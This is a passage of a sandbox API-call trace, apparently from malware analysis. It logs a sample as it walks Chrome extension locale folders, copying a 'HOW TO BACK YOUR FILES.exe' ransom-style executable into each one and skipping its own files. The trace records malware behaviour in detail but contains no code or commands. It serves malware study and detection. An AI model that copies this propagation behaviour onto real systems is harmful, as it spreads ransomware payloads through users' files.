Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835041e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5c2620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5c2620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.818] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.818] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.818] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms" [0104.818] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms" [0104.818] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.818] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.819] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.819] GetLastError () returned 0x0 [0104.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.819] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.819] CloseHandle (hObject=0x120) returned 1 [0104.819] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.819] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834fccb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5c2620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5c2620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.820] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.820] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.820] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr" [0104.820] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr" [0104.820] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.820] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.821] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.821] GetLastError () returned 0x0 [0104.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.821] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.821] CloseHandle (hObject=0x120) returned 1 [0104.821] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.821] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834f0960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5e8780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5e8780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.821] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.821] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.821] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml" [0104.822] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml" [0104.822] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.822] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.822] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.823] GetLastError () returned 0x0 [0104.823] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.823] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.823] CloseHandle (hObject=0x120) returned 1 [0104.823] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.823] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834e9430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5e8780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5e8780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.823] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.823] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.823] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv" [0104.823] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv" [0104.823] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.823] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.824] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.824] GetLastError () returned 0x0 [0104.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.824] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.824] CloseHandle (hObject=0x120) returned 1 [0104.825] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834da9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d60e8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d60e8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.825] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.825] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.825] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt" [0104.825] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt" [0104.825] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.825] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.826] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.826] GetLastError () returned 0x0 [0104.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.826] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.826] CloseHandle (hObject=0x120) returned 1 [0104.827] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.827] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834d34a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d60e8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d60e8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.827] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.827] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.827] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko" [0104.827] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko" [0104.827] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.827] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.828] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.828] GetLastError () returned 0x0 [0104.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.828] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.828] CloseHandle (hObject=0x120) returned 1 [0104.828] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.828] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834cbf70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d634a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d634a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.829] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.829] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.829] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn" [0104.829] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn" [0104.829] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.829] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js 